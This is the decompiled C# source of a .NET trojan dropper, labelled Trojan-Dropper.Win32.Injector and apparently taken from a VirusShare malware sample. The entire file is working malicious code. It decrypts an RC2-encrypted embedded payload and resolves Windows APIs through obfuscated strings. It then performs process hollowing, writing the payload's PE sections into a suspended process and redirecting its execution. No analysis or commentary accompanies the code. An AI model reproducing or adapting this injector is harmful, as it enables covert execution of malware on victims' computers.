// Decompiled with JetBrains decompiler // Type: Â4gÌµÒ // Assembly: bbsx3kxh, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: FF3146BD-161B-4924-BABD-AF97B1A59012 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Injector.oif-6c38ff7447d62661b0227594bb34a43fd9e95cc53db7c375cb079d41ef678d22.exe using Microsoft.VisualBasic.CompilerServices; using System; using System.Diagnostics; using System.IO; using System.Reflection; using System.Resources; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; using System.Threading; [StandardModule] internal sealed class Â4gÌµÒ { private static DateTime roy = DateTime.Now; [DllImport("irprops", CharSet = CharSet.Ansi, SetLastError = true)] public static extern long wjØÜÙ5(Decimal Ø0ÆÜÏ, float ÿÂ, [MarshalAs(UnmanagedType.VBByRefStr)] ref string ÙÂÄi, int nÖÁs, int Þ); public static byte[] Ú(byte[] ÖÓ, ulong ÂÞÖ) { byte[] numArray = new byte[15] { (byte) 148, (byte) 74, (byte) 150, (byte) 90, (byte) 73, (byte) 141, (byte) 130, (byte) 53, (byte) 227, (byte) 101, (byte) 78, (byte) 143, (byte) 151, (byte) 168, (byte) 55 }; using (RC2CryptoServiceProvider cryptoServiceProvider = new RC2CryptoServiceProvider()) { Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(numArray, numArray, 1); int num1 = true ? 1 : 0; cryptoServiceProvider.Key = rfc2898DeriveBytes.GetBytes((int) Math.Round((double) cryptoServiceProvider.KeySize / 8.0)); int num2 = true ? 1 : 0; cryptoServiceProvider.IV = rfc2898DeriveBytes.GetBytes((int) Math.Round((double) cryptoServiceProvider.BlockSize / 8.0)); return cryptoServiceProvider.CreateDecryptor().TransformFinalBlock(ÖÓ, 0, ÖÓ.Length); } } public static string ÎtÊkÏ(sbyte x0Îß, string Æy9, byte p0j59Ë) => Encoding.UTF8.GetString(Â4g̵Ò.Ú(Convert.FromBase64String(Æy9), 2079907628UL)); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string ÀdÉ); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr GetProcAddress(IntPtr ÀdÉ, [MarshalAs(UnmanagedType.VBByRefStr)] ref string ÆØÎÓÍi); public static ÆØÎÓÍi ÀdÉ<ÆØÎÓÍi>(string ÀÆ4th) => (ÆØÎÓÍi) Marshal.GetDelegateForFunctionPointer(Â4g̵Ò.GetProcAddress(Â4g̵Ò.LoadLibraryA(ref ÀÆ4th.Split(Convert.ToChar(58))[0]), ref ÀÆ4th.Split(Convert.ToChar(58))[1]), typeof (ÆØÎÓÍi)); public static void ÍÔÚÆ4Ö(sbyte ßq5, byte[] ÍÔÚÆ4Ö, DateTime ÂÜ4vn) { int num1 = 0; do { ++num1; } while (num1 <= 100); short num2 = 2302; string Ækÿ1 = Assembly.GetEntryAssembly().Location; byte num3 = 0; do { int num4 = (int) num3; while (num4 <= 30 && num4 != 25) ++num4; ++num3; } while (num3 <= (byte) 20); if (Directory.Exists(Conversions.ToString(Environment.SystemDirectory[0]) + Â4g̵Ò.ÎtÊkÏ((sbyte) -16, "pGJxb0xgkIehL44+nj3Q/9x1lEr7/J1M", (byte) 160))) { foreach (string directory in Directory.GetDirectories(Conversions.ToString(Environment.SystemDirectory[0]) + Â4g̵Ò.ÎtÊkÏ((sbyte) 0, "IPn3YJa+m5hRy0MfiKSHKcW4u/x8vRHeXlnXHaq4wBdaV4j/b6aXZQ==", (byte) 0))) { if (directory.Contains(Â4g̵Ò.ÎtÊkÏ((sbyte) 0, "GY1x7BFYPAg=", (byte) 190))) { Ækÿ1 = directory + Â4g̵Ò.ÎtÊkÏ((sbyte) -101, "nMHLqIYdLp7jqju8IneUbA==", (byte) 211); Guid.NewGuid(); break; } ++num2; } } byte[] numArray1 = new byte[6] { (byte) 0, (byte) 1, (byte) 2, (byte) 3, (byte) 4, (byte) 5 }; int[] numArray2 = new int[8] { 1, 16, 2, 32, 4, 64, 4, 64 }; bool flag1 = false; int int32 = BitConverter.ToInt32(ÍÔÚÆ4Ö, 60); int int16 = (int) BitConverter.ToInt16(ÍÔÚÆ4Ö, int32 + 6); IntPtr qgÅ1 = new IntPtr(BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 84)); IntPtr[] q = new IntPtr[4]; IntPtr num5; if (!Â4g̵Ò.ÀdÉ<Â4g̵Ò.ÙÉeÇ>(Â4g̵Ò.ÎtÊkÏ((sbyte) 86, "AkfNk3cb8FEj8mhR0MvaqFTiDyY1kC65", (byte) 125))((string) null, Ækÿ1, num5, num5, false, 4, num5, (string) null, new byte[0], q)) return; try { flag1 = true; uint[] Ækÿ2 = new uint[179]; Ækÿ2[0] = 65538U; if (Â4g̵Ò.ÀdÉ<Â4g̵Ò.ÑÀ>(Â4g̵Ò.ÎtÊkÏ((sbyte) -5, "AkfNk3cb8FHcThQeZcujxt1yReBRDsECGlDssfI1oHc=", (byte) 147))(q[1], Ækÿ2)) { IntPtr iÌ4_1; IntPtr Á7xÿßx; if (Â4g̵Ò.ÀdÉ<Â4g̵Ò.b>(Â4g̵Ò.ÎtÊkÏ((sbyte) -82, "AkfNk3cb8FH7avFy2XdgEvMsHes5Kn4PhPATuavLveE=", (byte) 12))(q[0], new IntPtr((long) Ækÿ2[41] + 8L), ref iÌ4_1, new IntPtr(4), ref Á7xÿßx)) { if (Â4g̵Ò.ÀdÉ<Â4g̵Ò.g_6nyl>(Â4g̵Ò.ÎtÊkÏ((sbyte) -119, "3pV6uVVnE5WOo9hXjwjtIuY27hF/nopxTKw6Oaxw6jo=", (byte) 157))(q[0], iÌ4_1) == 0U) { Â4g̵Ò.v v = Â4g̵Ò.ÀdÉ<Â4g̵Ò.v>(Â4g̵Ò.ÎtÊkÏ((sbyte) -115, "AkfNk3cb8FG4XDtrNYQh6ncBWjrHHpGG", (byte) 128)); IntPtr ÍÔÚÆ4Ö1 = q[0]; IntPtr num6 = new IntPtr(BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 52)); IntPtr Ækÿ3 = num6; IntPtr num7 = new IntPtr(BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 80)); IntPtr iÌ4_2 = num7; IntPtr Ækÿ4 = v(ÍÔÚÆ4Ö1, Ækÿ3, iÌ4_2, 12288, 64); Â4g̵Ò.ØÄ øä1 = Â4g̵Ò.ÀdÉ<Â4g̵Ò.ØÄ>(Â4g̵Ò.ÎtÊkÏ((sbyte) 72, "AkfNk3cb8FEW+TPPCclD8bWYWAftEoHWMhh1KGWdx2Q=", (byte) 35)); numArray1 = (byte[]) null; bool flag2 = øä1(q[0], Ækÿ4, ÍÔÚÆ4Ö, qgÅ1, ref Á7xÿßx); int[] dst1 = new int[10]; int num8 = int16 - 1; for (int index = 0; index <= num8; ++index) { dst1[0] = 15; dst1[5] = 223 + dst1[0]; Buffer.BlockCopy((Array) ÍÔÚÆ4Ö, int32 + 248 + index * 40, (Array) dst1, 0, 40); byte[] dst2 = new byte[dst1[4] - 1 + 1]; flag1 = false; dst1.Length.ToString(); Buffer.BlockCopy((Array) ÍÔÚÆ4Ö, dst1[5], (Array) dst2, 0, dst2.Length); Â4g̵Ò.ØÄ øä2 = øä1; IntPtr ÍÔÚÆ4Ö2 = q[0]; num7 = new IntPtr(Ækÿ4.ToInt32() + dst1[3]); IntPtr Ækÿ5 = num7; byte[] iÌ4_3 = dst2; num6 = new IntPtr(dst2.Length); IntPtr qgÅ2 = num6; ref IntPtr local = ref Á7xÿßx; flag2 = øä2(ÍÔÚÆ4Ö2, Ækÿ5, iÌ4_3, qgÅ2, ref local); } Â4g̵Ò.ØÄ øä3 = øä1; IntPtr ÍÔÚÆ4Ö3 = q[0]; num7 = new IntPtr((long) Ækÿ2[41] + 8L); IntPtr Ækÿ6 = num7; byte[] bytes = BitConverter.GetBytes(Ækÿ4.ToInt32()); num6 = new IntPtr(4); IntPtr qgÅ3 = num6; ref IntPtr local1 = ref Á7xÿßx; flag2 = øä3(ÍÔÚÆ4Ö3, Ækÿ6, bytes, qgÅ3, ref local1); Ækÿ2[44] = (uint) (Ækÿ4.ToInt32() + BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 40)); int num9 = Â4g̵Ò.ÀdÉ<Â4g̵Ò.ÑÀ>(Â4g̵Ò.ÎtÊkÏ((sbyte) -66, "AkfNk3cb8FEzYHHijFbTn+Bvu/hlKwVIJHW2Tl7CQI0=", (byte) 34))(q[1], Ækÿ2) ? 1 : 0; flag1 = true; int num10 = Â4g̵Ò.ÀdÉ<Â4g̵Ò.Ñ7>(Â4g̵Ò.ÎtÊkÏ((sbyte) 0, "AkfNk3cb8FFMOoT7qlSi1WE1Lh7B3VwP", (byte) 161))(q[1]); return; } } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } Process.GetProcessById(q[2].ToInt32()).Kill(); } [STAThread] public static void Main() { if (!new Mutex(false, Â4g̵Ò.ÎtÊkÏ((sbyte) 92, "r8XKtD49yqjBI+4aIG/OWWVanFCpcao5BzrVog0ovWrjymBH2XgD4p6xQf0dyhsY", (byte) 33)).WaitOne(0, false)) ProjectData.EndApp(); Â4g̵Ò.ÍÔÚÆ4Ö((sbyte) -27, Â4g̵Ò.Ú((byte[]) new ResourceManager("5txj2rf4", Assembly.GetExecutingAssembly()).GetObject(Â4g̵Ò.ÎtÊkÏ((sbyte) 113, "eAq5iK8LUXk=", (byte) 82)), 856643351UL), DateTime.Now); } public class ÀßdÊbq { [DebuggerNonUserCode] public ÀßdÊbq() { } public delegate double zÏaÔ(sbyte ÛÓ, uint ËlÇ, bool ÉÀjÏr, ulong Äm, string Ào1); public delegate void ceq64v(); } public delegate bool ÙÉeÇ( string ÍÔÚÆ4Ö, string Ækÿ, IntPtr iÌ4, IntPtr qgÅ, bool Á7xÿßx, int mÀu, IntPtr ÖÌ, string ÿÂÃÚu, byte[] Ü3, IntPtr[] q); public delegate bool ÑÀ(IntPtr ÍÔÚÆ4Ö, uint[] Ækÿ); public delegate bool b( IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ, ref IntPtr iÌ4, IntPtr qgÅ, ref IntPtr Á7xÿßx); public delegate uint g_6nyl(IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ); public delegate IntPtr v(IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ, IntPtr iÌ4, int qgÅ, int Á7xÿßx); public delegate bool ØÄ(IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ, byte[] iÌ4, IntPtr qgÅ, ref IntPtr Á7xÿßx); public delegate int Ñ7(IntPtr ÍÔÚÆ4Ö); }